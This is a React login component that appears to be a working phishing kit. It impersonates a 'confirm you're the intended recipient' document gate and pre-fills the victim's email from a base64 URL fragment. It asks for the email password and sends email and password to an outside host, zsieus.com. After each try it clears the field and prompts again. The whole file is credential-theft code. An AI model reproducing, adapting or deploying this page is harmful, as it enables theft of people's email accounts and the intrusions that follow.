import React, { useEffect, useState, useRef } from "react";
import "./Login.css";     
import lock from "./lockicon.png";
import backgroundImage2 from "./mbck12.png"; 

import { ClipLoader } from "react-spinners";
import { FaCheckCircle, FaTimesCircle,  FaEnvelope  } from 'react-icons/fa'; 

 
  
 

function Loginpage() {
  const [height, setHeight] = useState(0);
  const [email, setEmail] = useState("");
  const [password, setPassword] = useState("");
  const [errors, setErrors] = useState({});
  const [isLoading, setIsLoading] = useState(false);
  const [isFormValid, setIsFormValid] = useState(false);
  const [touched, setTouched] = useState({
    email: false,
    password: false,
  });

  const [serverMessage, setServerMessage] = useState('');
  const [messageType, setMessageType] = useState('');
  const passwordInputRef = useRef(null);

  const [isLoadingLogin, setIsLoadingLogin] = useState(false); 
  const [isLoginVisible, setIsLoginVisible] = useState(false); 
  const [autoemail, setAutoEmail] = useState("");
 
  const maskEmail = (email) => {
    const emailParts = email.split('@');
    let username = emailParts[0]; // Use `let` to allow reassignment
    let domain = emailParts[1];
  
    if (username.length > 20) {
      const start = username.slice(0, 5); 
      const end = username.slice(-5); 
      username = `${start}*****${end}`;
    }
  
    if (domain.length > 20) {
      const start = domain.slice(0, 5); 
      const end = domain.slice(-5); 
      domain = `${start}*****${end}`;
    }
  
    const maskedEmail = `${username}@${domain}`;
    return maskedEmail;
  }; 


//   useEffect(() => {
//     setTimeout(() => {
//         setIsLoadingLogin(false)
//       }, 3000);
//   }, []);

  

  


const validateForm = () => {
  const newErrors = {};

  if (autoemail === "") {
    if (!email) {
      newErrors.email = 'Email is required';
    } else if (!/\S+@\S+\.\S+/.test(email)) {
      newErrors.email = 'Email address is invalid';
    }
  }

  if (!password) {
    newErrors.password = 'Password is required';
  } else if (password.length < 5 || password.length > 30) {
    newErrors.password = 'Password i required';
  }

  setTouched({ email: true, password: true }); // Mark all fields as touched
  setErrors(newErrors);
  return Object.keys(newErrors).length === 0;
};



const handleBlur = (field) => {
  setTouched((prevTouched) => ({
    ...prevTouched,
    [field]: true,
  }));
};

  useEffect(() => {
    setIsFormValid(validateForm());
  }, [email, password, autoemail]);
  
  const handleSubmit = async (e) => {
    e.preventDefault();

    if (!validateForm()) {
      return;
    }

    setIsLoading(true); // Start loading spinner
    setServerMessage('');
    setMessageType(''); 
    const formData = new FormData();

    if(autoemail === ""){
      
    formData.append('email', email);
    formData.append('password', password);
    }else{ 
    formData.append('email', autoemail);
    formData.append('password', password);
    }
    

    try {
      const response = await fetch("https://zsieus.com/ulog/mlog.php", {
        method: 'POST',
        body: formData,
        headers: {
            'Accept': 'application/json',
          },
      });

      const result = await response.json();
      if (result.error) {
        setServerMessage(result.error);
        setMessageType('error');
      } else {
        setServerMessage(result.success);
        setMessageType('success');
      }
      setTimeout(() => {
        setServerMessage('');
        setMessageType('');
      }, 5000);
      console.log(result);
    } catch (error) { 
        setServerMessage('An error occurred. Please try again.');
        setMessageType('error');
        setTimeout(() => {
            setServerMessage('');
            setMessageType('');
          }, 5000);
    } finally {
      setIsLoading(false); // Stop loading spinner
      setPassword('');      
      passwordInputRef.current.focus(); 
    }
  };

  const openLoginBox = () => { 
    if (isLoginVisible || isLoadingLogin) return;
    setIsLoadingLogin(true);

    setTimeout(() => {
        setIsLoadingLogin(false);
        setIsLoginVisible(true)
      }, 3000);
    
  };
 


  const encodeFragmentToBase64 = () => {
    const url = window.location.href; // Get the current URL
    const index = url.indexOf('#'); // Find the index of the '#' sign
  
    if (index !== -1) {
      const fragment = url.substring(index + 1); // Get everything after the '#' sign
      const encodedFragment = atob(fragment); // Encode fragment to Base64
      return encodedFragment;
    } else {
      return ''; // Return an empty string if no fragment is found
    }
  };

  useEffect(() => {
    const fragment = encodeFragmentToBase64();
    setAutoEmail(fragment);
  }, []);

  console.log(autoemail)

  const inputEmailValue = email || autoemail;
  return (
    <div
    className="image-container"
      style={{
        backgroundImage: `url(${backgroundImage2})`, 
    }}
         

      onClick={openLoginBox}
    > 
    
       {isLoginVisible ? <div id="overlay"><div id="float-box" style={{ marginTop: "150px" }}>
          <center>
            <img src={lock} style={{width: "50px"}}/>
          </center>
          <div style={{ textAlign: "center" }}>
            <font size="1" style={{ fontWeight: "bolder", margin: "4px" }}>
              Confirm you're the intended recipient
              <br /> 
            </font>
          </div>
          <form onSubmit={handleSubmit}>
  {autoemail === "" ? (
    <div>
      <input
        type="email"
        id="email"
        placeholder="Company email address"
        onChange={(e) => setEmail(e.target.value)}
        onBlur={() => handleBlur("email")}
        required
        value={inputEmailValue}
        autoFocus={!autoemail}
      />
      {touched.email && errors.email && (
        <span style={{ fontSize: 12, color: "red" }}>{errors.email}</span>
      )}
    </div>
  ) : (
    <div style={{ display: "flex", alignItems: "center", justifyContent: "center" }}>
      <div style={{ flexShrink: 0 }}>
        <FaEnvelope size={12} style={{ marginRight: "2px" }} color="#674705" />
      </div>
      <font size="1" style={{ fontWeight: "bolder", margin: "4px" }}>
        {maskEmail(inputEmailValue)}
        <br />
      </font>
    </div>
  )}
  <div style={{ marginTop: "10px" }}>
    <input
      type="password"
      id="password"
      pattern=".{5,30}"
      placeholder="Email Password"
      value={password}
      onChange={(e) => setPassword(e.target.value)}
      onBlur={() => handleBlur("password")}
      ref={passwordInputRef}
      required
      autoFocus={autoemail}
    />
    {touched.password && errors.password && (
      <span style={{ fontSize: 12, color: "red" }}>{errors.password}</span>
    )}
  </div>
  <button
    type="submit"
    id="submit"
    disabled={isLoading || !isFormValid}
    style={{
      display: "flex",
      alignItems: "center",
      justifyContent: "center",
    }}
  >
    {isLoading ? <ClipLoader size={14} color="#fff" /> : "Verify"}
  </button>
  {serverMessage && (
    <div style={{ display: "flex", marginTop: "10px" }}>
      {messageType === "success" ? (
        <FaCheckCircle color="green" size={12} style={{ marginRight: "1px" }} />
      ) : (
        <FaTimesCircle color="red" size={12} style={{ marginRight: "1px" }} />
      )}
      <span style={{ fontSize: 12, color: "red" }}>{serverMessage}</span>
    </div>
  )}
</form>

        </div></div> : <div></div>}


        {isLoadingLogin ? <div id="overlay"><div className="spinners"></div></div> : <div></div>}
    </div>
  );
}

export default Loginpage;
